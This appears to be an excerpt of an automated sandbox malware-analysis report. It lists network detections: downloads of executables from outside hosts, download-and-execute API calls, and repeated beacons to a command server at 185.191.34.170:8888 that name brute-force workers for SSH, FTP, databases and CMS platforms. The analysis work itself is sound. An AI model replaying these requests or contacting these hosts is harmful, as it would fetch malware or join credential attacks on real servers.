Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52

Source: C:\Users\user\AppData\Local\Temp\9675.exe

Code function: 21_2_00404CE0 GetModuleFileNameW,SHGetFolderPathW,DeleteUrlCacheEntryW,URLOpenBlockingStreamW,URLOpenBlockingStreamW,DeleteUrlCacheEntryW,URLDownloadToFileW,ShellExecuteW,

21_2_00404CE0

Source: global traffic	HTTP traffic detected: GET /reestr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: GET /Runtimebroker.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.241.19.52
Source: global traffic	HTTP traffic detected: GET /bots/knock?worker=Universal&os=Windows&version=3.13 HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /project/active HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /bots/chkVersion?currVers=3.13&arch=win HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
